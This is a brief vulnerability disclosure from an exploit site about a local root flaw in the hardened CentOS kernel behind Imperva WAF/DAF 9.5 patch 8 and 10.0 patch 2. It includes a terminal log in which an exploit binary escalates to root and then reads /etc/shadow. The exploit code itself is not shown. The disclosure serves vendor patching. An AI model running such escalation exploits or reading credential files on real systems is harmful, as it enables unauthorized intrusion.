Home / exploits Imperva WAF/DAF 9.5 patch8 and 10.0 patch 2 localroot vulnerability
Posted on 22 November 2013
Imperva use hardened centos 5.4 to run Web Application Firewall and Database Activity Monitoring product. It could be exploit to get root in the kernel 2.6.18-164.15.1.el5.imp4 which was built by imperva in 9.5 patch 8 and 10.0 patch 2. I hope imperva could upgrade your OS to centos 5.9 with kernel 2.6.18-348 to keep your system secure. Your can check the attachment for details. [test95p8 () GFWAF ~]$ uname -a Linux GFWAF 2.6.18-164.15.1.el5.imp4 #1 SMP Mon Apr 8 15:29:20 IDT 2013 x86_64 x86_64 x86_64 GNU/Linux [test95p8 () GFWAF ~]$ cat /etc/redhat-release Imperva release 5.4 (Final) [test95p8 () GFWAF ~]$ wc -l /etc/shadow wc: /etc/shadow: Permission denied [test95p8 () GFWAF ~]$ id uid=505(test95p8) gid=507(test95p8) groups=507(test95p8) [test95p8 () GFWAF ~]$ ./centos54_localroot_exp ########snip############## sh-3.2# id uid=0(root) gid=507(test95p8) groups=507(test95p8) sh-3.2# wc -l /etc/shadow 40 /etc/shadow sh-3.2# [root () WAF ~]# impctl platform show 2> /dev/null | grep version version 10.0.0.2_0 [root () WAF ~]# uname -a Linux WAF 2.6.18-164.15.1.el5.imp4 #1 SMP Mon Apr 8 15:29:20 IDT 2013 x86_64 x86_64 x86_64 GNU/Linux [root () WAF ~]# cat /etc/redhat-release Imperva release 5.4 (Final)
